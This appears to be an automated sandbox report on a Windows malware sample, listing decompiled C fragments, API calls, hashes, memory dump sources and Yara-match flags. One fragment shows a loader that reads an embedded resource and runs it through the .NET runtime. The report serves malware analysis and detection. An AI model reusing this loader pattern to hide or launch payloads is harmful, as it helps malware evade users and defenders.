                    • Instruction ID: 745d8aea2948d59e8f4131270c2d6e2400b802fcee182b485bd219908670f12e
                    • Opcode Fuzzy Hash: 8f9e7e1eb2eb4ff65370eb654d8b063f56432c1875c7e953f8628fa1716ea4b8
                    • Instruction Fuzzy Hash: 6211E679A20204EFDB20DB65FC89FAB73BDE788700F104217FA05971D0DA71A955CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0028CB2D(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                    				intOrPtr _t25;
                    				void* _t26;
                    
                    				_t25 = _a16;
                    				if(_t25 == 0x65 || _t25 == 0x45) {
                    					_t26 = E0028C41F(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                    					goto L9;
                    				} else {
                    					_t35 = _t25 - 0x66;
                    					if(_t25 != 0x66) {
                    						__eflags = _t25 - 0x61;
                    						if(_t25 == 0x61) {
                    							L7:
                    							_t26 = E0028C506(_a4, _a8, _a12, _a20, _a24, _a28);
                    						} else {
                    							__eflags = _t25 - 0x41;
                    							if(__eflags == 0) {
                    								goto L7;
                    							} else {
                    								_t26 = E0028CA40(__ebx, __edx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                    							}
                    						}
                    						L9:
                    						return _t26;
                    					} else {
                    						return E0028C97F(__ebx, __edx, _t35, _a4, _a8, _a12, _a20, _a28);
                    					}
                    				}
                    			}






                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                    • Instruction ID: 9869ca653316b93273578c834a361c9a5a89d74068560ac355614e0913b6d024
                    • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                    • Instruction Fuzzy Hash: 2911C27A01114EBBCF126E84DC12CEE3F22FB08394B288415FE1858070D336C9B1ABA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00282610(intOrPtr _a4) {
                    				short _v516;
                    				short _v1028;
                    
                    				LoadStringW( *0x2970e0, 0x179,  &_v516, 3);
                    				wsprintfW( &_v1028,  &_v516, _a4);
                    				LoadStringW( *0x2970e0, 0x171,  &_v516, 6);
                    				return MessageBoxW( *0x2970e4,  &_v1028,  &_v516, 0x33);
                    			}






                    APIs
                    • LoadStringW.USER32(?,00000179,?,00000003), ref: 00282635
                    • wsprintfW.USER32 ref: 00282649
                    • LoadStringW.USER32(?,00000171,?,00000006), ref: 00282666
                    • MessageBoxW.USER32(?,?,?,00000033), ref: 0028267E
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: LoadString$Messagewsprintf
                    • String ID:
                    • API String ID: 3675432989-0
                    • Opcode ID: 32b838d3014462a6ed3094297d467b3e168fcbfeb6e0b64198a6beaf648b8e5f
                    • Instruction ID: 8efd40926e72bb3c5ca581b9dc27891ea6d394ff418b03ed738ca7b7ff8d4a26
                    • Opcode Fuzzy Hash: 32b838d3014462a6ed3094297d467b3e168fcbfeb6e0b64198a6beaf648b8e5f
                    • Instruction Fuzzy Hash: 290144B6920218AFD711DB98EC89FF6737CBB48700F04818BB709A7181D6706A14CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00283581() {
                    				intOrPtr _t5;
                    				intOrPtr _t6;
                    				intOrPtr _t10;
                    				void* _t12;
                    				intOrPtr _t15;
                    				intOrPtr* _t16;
                    				signed int _t19;
                    				signed int _t20;
                    				intOrPtr _t26;
                    				intOrPtr _t27;
                    
                    				_t5 =  *0x2970c0;
                    				_t26 = 0x14;
                    				if(_t5 != 0) {
                    					if(_t5 < _t26) {
                    						_t5 = _t26;
                    						goto L4;
                    					}
                    				} else {
                    					_t5 = 0x200;
                    					L4:
                    					 *0x2970c0 = _t5;
                    				}
                    				_t6 = E00286CCA(_t5, 4);
                    				 *0x2960a4 = _t6;
                    				if(_t6 != 0) {
                    					L8:
                    					_t19 = 0;
                    					_t15 = 0x294008;
                    					while(1) {
                    						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                    						_t15 = _t15 + 0x20;
                    						_t19 = _t19 + 4;
                    						if(_t15 >= 0x294288) {
                    							break;
                    						}
                    						_t6 =  *0x2960a4;
                    					}
                    					_t27 = 0xfffffffe;
                    					_t20 = 0;
                    					_t16 = 0x294018;
                    					do {
                    						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x295fa0 + (_t20 >> 5) * 4))));
                    						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                    							 *_t16 = _t27;
                    						}
                    						_t16 = _t16 + 0x20;
                    						_t20 = _t20 + 1;
                    					} while (_t16 < 0x294078);
                    					return 0;
                    				} else {
                    					 *0x2970c0 = _t26;
                    					_t6 = E00286CCA(_t26, 4);
                    					 *0x2960a4 = _t6;
                    					if(_t6 != 0) {
                    						goto L8;
                    					} else {
                    						_t12 = 0x1a;
                    						return _t12;
                    					}
                    				}
                    			}














                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: __calloc_crt
                    • String ID: x@)
                    • API String ID: 3494438863-392705939
                    • Opcode ID: 41b07e4c4a0600adb8199d7034c3aebd0feadc80ab24ec8d04846fcc55b09d65
                    • Instruction ID: 7b1f0429bc20b716885479a35626b49f6d04e1c7125b07e020435093c934b459
                    • Opcode Fuzzy Hash: 41b07e4c4a0600adb8199d7034c3aebd0feadc80ab24ec8d04846fcc55b09d65
                    • Instruction Fuzzy Hash: 9311EC367375115BEB18EF1DBC8D6652385FB48B24758012BF605CB3D0EB34DA614740
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • DecodePointer.KERNEL32(?,00283CB2,00000000,00000000,00000000,00000000,00000000,0028A4F8,?,00286212,00000003,0028A51B,00000001,00000000,00000000), ref: 00283C84
                    • __invoke_watson.LIBCMT ref: 00283CA0
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: DecodePointer__invoke_watson
                    • String ID: .(
                    • API String ID: 4034010525-3375098775
                    • Opcode ID: 71ff6abe595ca3f92193aa33450ca7d47877ce67ba9e60f544bbc1de77c1a542
                    • Instruction ID: 3973f6b7878f0546d7fa801e38685c4ef15b4c8840f3f5cf40c168273c45d7e8
                    • Opcode Fuzzy Hash: 71ff6abe595ca3f92193aa33450ca7d47877ce67ba9e60f544bbc1de77c1a542
                    • Instruction Fuzzy Hash: 00E0EC3651010DBBCF426F65DC0A96A3F66FB44750B454821FD1491071D633C931EB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:6.6%
                    Dynamic/Decrypted Code Coverage:65.2%
                    Signature Coverage:3.9%
                    Total number of Nodes:181
                    Total number of Limit Nodes:15

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E0040147B() {
                    				void* _v8;
                    				struct HRSRC__* _t4;
                    				long _t10;
                    				struct HRSRC__* _t12;
                    				void* _t16;
                    
                    				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
                    				_t12 = _t4;
                    				if(_t12 == 0) {
                    					L6:
                    					ExitProcess(0);
                    				}
                    				_t16 = LoadResource(GetModuleHandleW(0), _t12);
                    				if(_t16 != 0) {
                    					_v8 = LockResource(_t16);
                    					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
                    					_t13 = _v8;
                    					if(_v8 != 0 && _t10 != 0) {
                    						L00401000(_t13, _t10); // executed
                    					}
                    				}
                    				FreeResource(_t16);
                    				goto L6;
                    			}









                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040148E
                    • FindResourceW.KERNEL32(00000000,?,?,80004003), ref: 00401491
                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014A0
                    • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014A3
                    • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014B0
                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014BC
                    • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014BF
                      • Part of subcall function 0040147B: CLRCreateInstance.MSCOREE(00412D78,00412D38,?), ref: 00401037
                    • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014D8
                    • ExitProcess.KERNEL32 ref: 004014E0
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                    • String ID: v4.0.30319
                    • API String ID: 2372384083-3152434051
                    • Opcode ID: e46176bf33edfd7360af789f5c5b3a087a38c03d6e498ff32b619ddbb1b13555
                    • Instruction ID: 1025187115c16df301aa5e6fb14f5cc9936e15f8599d421e9e42fb84dc5f9529
                    • Opcode Fuzzy Hash: e46176bf33edfd7360af789f5c5b3a087a38c03d6e498ff32b619ddbb1b13555
                    • Instruction Fuzzy Hash: D4F04470A0131477EB202BF34D4DF2B755C9F85746F040874F601BA2A0CAB4DC008679
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00401E16() {
                    				_Unknown_base(*)()* _t1;
                    
                    				_t1 = SetUnhandledExceptionFilter(E00401E22); // executed
                    				return _t1;
                    			}




                    0x00401e1b
                    0x00401e21

                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_00001E22,0040170D), ref: 00401E1B
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 7cc42e0c232be2002621d7aac29e4c4a89884d8af04e1807cbd6d37abe40dfe2
                    • Instruction ID: 1700cd800284021a96fa1165edcf07aa52b884b6f150888f85792e917e9d8571
                    • Opcode Fuzzy Hash: 7cc42e0c232be2002621d7aac29e4c4a89884d8af04e1807cbd6d37abe40dfe2
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GetCurrentProcess.KERNEL32 ref: 0319B730
                    • GetCurrentThread.KERNEL32 ref: 0319B76D
                    • GetCurrentProcess.KERNEL32 ref: 0319B7AA
                    • GetCurrentThreadId.KERNEL32 ref: 0319B803
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Current$ProcessThread
                    • String ID:
                    • API String ID: 2063062207-0
                    • Opcode ID: c6eb666671e1d7cb003551e3076d4493869ab00cc8bb67d4f38de81ce5f4d4a6
                    • Instruction ID: 169960ce97741599e2be112909e997c2a1105bf503ab46c09e5dfdf3f88caca6
                    • Opcode Fuzzy Hash: c6eb666671e1d7cb003551e3076d4493869ab00cc8bb67d4f38de81ce5f4d4a6
                    • Instruction Fuzzy Hash: 945184B49003488FEB14CFAAD988B9EBFF5AF48314F24855AE009B7390D7386844CB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GetCurrentProcess.KERNEL32 ref: 0319B730
                    • GetCurrentThread.KERNEL32 ref: 0319B76D
                    • GetCurrentProcess.KERNEL32 ref: 0319B7AA
                    • GetCurrentThreadId.KERNEL32 ref: 0319B803
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Current$ProcessThread
                    • String ID:
                    • API String ID: 2063062207-0
                    • Opcode ID: 4ee8a08dc0d6fd50a8c1eb649c81e5d54ddb2330d78bc3e5ee36ee359dda47a3
                    • Instruction ID: 444e3cd085f91aca5ca4a6ccd87c4d5c657ab2dc33c5a9fc9a639bc8282bf578
                    • Opcode Fuzzy Hash: 4ee8a08dc0d6fd50a8c1eb649c81e5d54ddb2330d78bc3e5ee36ee359dda47a3
                    • Instruction Fuzzy Hash: E65153B49006088FDB14CFAAD988B9EBBF5AF48304F24855AE019B7390D7386884CB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E00407507() {
                    				WCHAR* _t1;
                    				void* _t3;
                    				void* _t17;
                    				WCHAR* _t19;
                    
                    				_t1 = GetEnvironmentStringsW();
                    				_t19 = _t1;
                    				if(_t19 != 0) {
                    					_t11 = E004074D0(_t19) - _t19 & 0xfffffffe;
                    					_t3 = E00407D48(E004074D0(_t19) - _t19 & 0xfffffffe); // executed
                    					_t17 = _t3;
                    					if(_t17 != 0) {
                    						E00403120(_t17, _t19, _t11);
                    					}
                    					E0040650B(0);
                    					FreeEnvironmentStringsW(_t19);
                    					return _t17;
                    				} else {
                    					return _t1;
                    				}
                    			}








                    APIs
                    • GetEnvironmentStringsW.KERNEL32(?,00404A94), ref: 0040750A
                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,00404A94), ref: 00407549
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: EnvironmentStrings$Free
                    • String ID:
                    • API String ID: 3328510275-0
                    • Opcode ID: 687c54f429ede6c9a3700f1b62dc63b57466bf3dfbcabf1351402392e6b5ef8b
                    • Instruction ID: b1f7f09f612f60460f80359e47cfd29f29434f3d7477643bc4f3bdfe63dfc6bb
                    • Opcode Fuzzy Hash: 687c54f429ede6c9a3700f1b62dc63b57466bf3dfbcabf1351402392e6b5ef8b
                    • Instruction Fuzzy Hash: 44E09B3754D63136D112323A7C4999F1A0DCFC6679715023BF4147A2C5EE789D0200EE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0319962E
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: HandleModule
                    • String ID:
                    • API String ID: 4139908857-0
                    • Opcode ID: c7e2376147e11b091556d0de6c6e31b2502a81b8955c54852399cdd89a232aa0
                    • Instruction ID: a9693bf8fad3026ef6a4e715b458f31625ad1c1a7df86f6d971150efd888f0f0
                    • Opcode Fuzzy Hash: c7e2376147e11b091556d0de6c6e31b2502a81b8955c54852399cdd89a232aa0
                    • Instruction Fuzzy Hash: 227134B0A00B058FEB64DF6AC55076ABBF5BF88310F14892ED44ADBB40DB74E845CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0319FD0A
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: CreateWindow
                    • String ID:
                    • API String ID: 716092398-0
                    • Opcode ID: 8513ffb58e0b88229f194b353f33ee7dba47cfffdcb1eacc8e24dab4e4212ad7
                    • Instruction ID: 10e67a6b74d5dd10eece7f985380a37be17d1eedde84b473ef1c69bb3814c0cc
                    • Opcode Fuzzy Hash: 8513ffb58e0b88229f194b353f33ee7dba47cfffdcb1eacc8e24dab4e4212ad7
                    • Instruction Fuzzy Hash: FD51A0B1D00349AFDF14CFA9C884ADEBBB5BF48314F24812AE819AB210D7759945CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0319FD0A
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: CreateWindow
                    • String ID:
                    • API String ID: 716092398-0
                    • Opcode ID: 0a683b2ccdb90914ebeb9b55947d52a51514b76d4b8f749fb8a95713790e97c5
                    • Instruction ID: aabb91dcbf84d11bd97dae0805955d22890b92cefd185136d5b65eb74adbf1ce
                    • Opcode Fuzzy Hash: 0a683b2ccdb90914ebeb9b55947d52a51514b76d4b8f749fb8a95713790e97c5
                    • Instruction Fuzzy Hash: 434191B1D00349AFDF14CFA9C884ADEFBB5BF48314F24812AE819AB250D7749945CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.571984885.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: true
                    • Associated: 00000002.00000002.571954055.0000000007660000.00000004.08000000.00040000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7660000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 165a39dc6649fbc248414eea5843989312f50fb5ff38d402ea717ed611f3970b
                    • Instruction ID: cfea6763d7e82808e81f9d493bfe51d26644d7786c42cfae499aec29aedc5491
                    • Opcode Fuzzy Hash: 165a39dc6649fbc248414eea5843989312f50fb5ff38d402ea717ed611f3970b
                    • Instruction Fuzzy Hash: 213136F0D0065A9FCB14CFA9C48479EBBB1EF08354F148529E816B7340D7749845CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0319BD87
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID:
                    • API String ID: 3793708945-0
                    • Opcode ID: 95d7ed8e6c95f18cfe69ac4db1f4b7d7a3d0bab543e23c5efd75e44af4f0c81e
                    • Instruction ID: 3c89064815c4e1f6e247c2ff8d2f6f8b634e11dfb0f86b475569909a258c908d
                    • Opcode Fuzzy Hash: 95d7ed8e6c95f18cfe69ac4db1f4b7d7a3d0bab543e23c5efd75e44af4f0c81e
                    • Instruction Fuzzy Hash: DE21E7B59002489FDF10CFAAD984ADEFBF9EB48314F14801AE954B3210D374A945CF65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0319BD87
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID:
                    • API String ID: 3793708945-0
                    • Opcode ID: 1c88ac7ca892dcf848983d130decf481ee4d4a9fd3f45e4c8202ec437f9a226b
                    • Instruction ID: 94d43abf0c9bf5ccd6dece2400a275d06015cc2a0f8e5930a138ae8825ff48c5
                    • Opcode Fuzzy Hash: 1c88ac7ca892dcf848983d130decf481ee4d4a9fd3f45e4c8202ec437f9a226b
                    • Instruction Fuzzy Hash: 2E21C4B59002589FDB10CFAAD984ADEFFF9EB48314F14841AE958B3310D378A944CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 188 3199849-319984a 189 319984c-319984e 188->189 190 3199851-3199854 188->190 191 3199855-3199890 189->191 195 3199850 189->195 190->191 193 3199898-31998c7 LoadLibraryExW 191->193 194 3199892-3199895 191->194 196 31998c9-31998cf 193->196 197 31998d0-31998ed 193->197 194->193 195->190 196->197
                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,031996A9,00000800,00000000,00000000), ref: 031998BA
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: f778156e7891fcf63b90358056c2b35da3e5ef0baa6276c3f1c25d1261b0a977
                    • Instruction ID: a5ab8edae2dadc2023e0a9aa0e152550d1de8483eee7700eadbed0421c9e7de7
                    • Opcode Fuzzy Hash: f778156e7891fcf63b90358056c2b35da3e5ef0baa6276c3f1c25d1261b0a977
                    • Instruction Fuzzy Hash: AB21F2B68002498BEF10CFAAC484ADEFBF8EB48310F14846EE419B7600C378A545CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 207 3198768-3199890 211 3199898-31998c7 LoadLibraryExW 207->211 212 3199892-3199895 207->212 213 31998c9-31998cf 211->213 214 31998d0-31998ed 211->214 212->211 213->214
                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,031996A9,00000800,00000000,00000000), ref: 031998BA
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 737acf2403bd05c495f6e9da976431137530d30d1dc828e1b4054e2a4e0ce732
                    • Instruction ID: 20da62e769da8c55b05774074ec8d0fd7d33733012da88a1c7f5517310bbb0fe
                    • Opcode Fuzzy Hash: 737acf2403bd05c495f6e9da976431137530d30d1dc828e1b4054e2a4e0ce732
                    • Instruction Fuzzy Hash: FE1114B6D002098FDB10CF9AC484ADEFBF8EB48310F14846EE819B7600C375A945CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 200 3197ee9-3197f44 202 3197f92-3197fab 200->202 203 3197f46-3197f6e KiUserCallbackDispatcher 200->203 204 3197f70-3197f76 203->204 205 3197f77-3197f8b 203->205 204->205 205->202
                    APIs
                    • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 03197F5D
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: CallbackDispatcherUser
                    • String ID:
                    • API String ID: 2492992576-0
                    • Opcode ID: 1bbba7c4fd4eb5546b502648b0b44db552135e3f5118dfe02d66ec245c5ce039
                    • Instruction ID: 7c7ec8de291d9c3aeddafcab5719137d9841c90d7619bb6ed1e14fcdb4c921f0
                    • Opcode Fuzzy Hash: 1bbba7c4fd4eb5546b502648b0b44db552135e3f5118dfe02d66ec245c5ce039
                    • Instruction Fuzzy Hash: C621A2758043988FDB11DFA5D4443DABFF8AF1A314F18809ED894B7241C7789648CBB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 217 319fef0-319fefc 218 319fe99-319feaa SetWindowLongW 217->218 219 319feff-319ff40 217->219 220 319feac-319feb2 218->220 221 319feb3-319fec7 218->221 227 319ff4e-319ff55 219->227 228 319ff42-319ff44 219->228 220->221 228->227
                    APIs
                    • SetWindowLongW.USER32(?,?,?), ref: 0319FE9D
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: LongWindow
                    • String ID:
                    • API String ID: 1378638983-0
                    • Opcode ID: fa31ea5524a751377b9d9ccbd097d8f361b7d49dcea9a3f5334d10cff15c9bed
                    • Instruction ID: 6712c40e5c3139e330669f5767d61d9f3b12148941cc8c70511b131edb6df9cd
                    • Opcode Fuzzy Hash: fa31ea5524a751377b9d9ccbd097d8f361b7d49dcea9a3f5334d10cff15c9bed
                    • Instruction Fuzzy Hash: 5D01BD3A6002549FC32297ADE8083EEBFE9AF89222F2440DBE445E7781C7740909C7B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 229 31995c8-3199608 231 319960a-319960d 229->231 232 3199610-319963b GetModuleHandleW 229->232 231->232 233 319963d-3199643 232->233 234 3199644-3199658 232->234 233->234
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0319962E
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: HandleModule
                    • String ID:
                    • API String ID: 4139908857-0
                    • Opcode ID: 911882ad2afc6f9e1dcc40b9b581c4e25ee5c431f611ff5c764c4f6aa5968692
                    • Instruction ID: ec5ee9bf9a32e7a962f6d397886a75caa2ac8927befb04b9b7dbe42b66cf7e59
                    • Opcode Fuzzy Hash: 911882ad2afc6f9e1dcc40b9b581c4e25ee5c431f611ff5c764c4f6aa5968692
                    • Instruction Fuzzy Hash: B111E3B5C006498FDB10CF9AC444ADEFBF4EF48314F14851AD819B7600D378A545CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetWindowLongW.USER32(?,?,?), ref: 0319FE9D
                    Memory Dump Source
